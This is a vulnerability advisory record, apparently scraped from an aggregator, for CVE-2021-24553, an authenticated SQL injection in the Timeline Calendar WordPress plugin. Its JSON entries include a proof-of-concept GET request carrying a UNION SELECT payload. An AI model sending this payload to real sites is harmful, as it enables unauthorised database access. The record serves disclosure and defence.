CVE-2021-24553

2021-08-23T12:15:00

Description

The Timeline Calendar WordPress plugin through 1.2 does not sanitise, validate or escape the edit GET parameter before using it in a SQL statement when editing events, leading to an authenticated SQL injection issue. Other SQL Injections are also present in the plugin

Affected Software

CPE Name	Name	Version
timeline_calendar_project:timeline_calendar	timeline calendar project timeline calendar	1.2

{"id": "CVE-2021-24553", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24553", "description": "The Timeline Calendar WordPress plugin through 1.2 does not sanitise, validate or escape the edit GET parameter before using it in a SQL statement when editing events, leading to an authenticated SQL injection issue. Other SQL Injections are also present in the plugin", "published": "2021-08-23T12:15:00", "modified": "2021-08-26T19:09:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24553", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/14c75a00-a52b-430b-92da-5145e5aee30a", "https://codevigilant.com/disclosure/2021/wp-plugin-timeline-calendar/"], "cvelist": ["CVE-2021-24553"], "immutableFields": [], "lastseen": "2022-03-23T14:57:03", "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:14C75A00-A52B-430B-92DA-5145E5AEE30A"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:14C75A00-A52B-430B-92DA-5145E5AEE30A"]}], "rev": 4}, "score": {"value": 1.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:14C75A00-A52B-430B-92DA-5145E5AEE30A"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:14C75A00-A52B-430B-92DA-5145E5AEE30A"]}]}, "exploitation": null, "vulnersScore": 1.9}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:timeline_calendar_project:timeline_calendar:1.2"], "cpe23": ["cpe:2.3:a:timeline_calendar_project:timeline_calendar:1.2:*:*:*:*:wordpress:*:*"], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "timeline_calendar_project:timeline_calendar", "version": "1.2", "operator": "le", "name": "timeline calendar project timeline calendar"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:timeline_calendar_project:timeline_calendar:1.2:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/14c75a00-a52b-430b-92da-5145e5aee30a", "name": "https://wpscan.com/vulnerability/14c75a00-a52b-430b-92da-5145e5aee30a", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://codevigilant.com/disclosure/2021/wp-plugin-timeline-calendar/", "name": "https://codevigilant.com/disclosure/2021/wp-plugin-timeline-calendar/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}

{"wpexploit": [{"lastseen": "2021-09-14T23:18:48", "description": "The plugin does not sanitise, validate or escape the edit GET parameter before using it in a SQL statement when editing events, leading to an authenticated SQL injection issue. Other SQL Injections are also present in the plugin\n", "cvss3": {}, "published": "2021-07-24T00:00:00", "type": "wpexploit", "title": "Timeline Calendar <= 1.2 - Authenticated (admin+) SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24553"], "modified": "2021-07-24T15:54:05", "id": "WPEX-ID:14C75A00-A52B-430B-92DA-5145E5AEE30A", "href": "", "sourceData": "GET /wp-admin/admin.php?page=events&edit=-4292%20UNION%20ALL%20SELECT%20user(),user(),current_user()-- HTTP/1.1\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: [admin+]\r\nConnection: close", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-09-14T23:18:48", "description": "The plugin does not sanitise, validate or escape the edit GET parameter before using it in a SQL statement when editing events, leading to an authenticated SQL injection issue. Other SQL Injections are also present in the plugin\n\n### PoC\n\nGET /wp-admin/admin.php?page=events&edit;=-4292%20UNION%20ALL%20SELECT%20user(),user(),current_user()-- HTTP/1.1 Accept-Language: en-US,en;q=0.9 Cookie: [admin+] Connection: close\n", "cvss3": {}, "published": "2021-07-24T00:00:00", "type": "wpvulndb", "title": "Timeline Calendar <= 1.2 - Authenticated (admin+) SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24553"], "modified": "2021-07-24T15:54:05", "id": "WPVDB-ID:14C75A00-A52B-430B-92DA-5145E5AEE30A", "href": "https://wpscan.com/vulnerability/14c75a00-a52b-430b-92da-5145e5aee30a", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:22", "description": "Authenticated SQL Injection (SQLi) vulnerability discovered by Shreya Pohekar in WordPress Timeline Calendar plugin (versions <= 1.2).\n\n## Solution\n\n\r\n This plugin has been closed as of June 3, 2021 and is not available for download. Reason: Security Issue.\r\n ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-23T00:00:00", "type": "patchstack", "title": "WordPress Timeline Calendar plugin <= 1.2 - Authenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24553"], "modified": "2021-07-23T00:00:00", "id": "PATCHSTACK:CF02BBF60EE087719EF8EA481DC472B4", "href": "https://patchstack.com/database/vulnerability/timeline-calendar/wordpress-timeline-calendar-plugin-1-2-authenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

CVE-2021-24553

Description

Affected Software

Related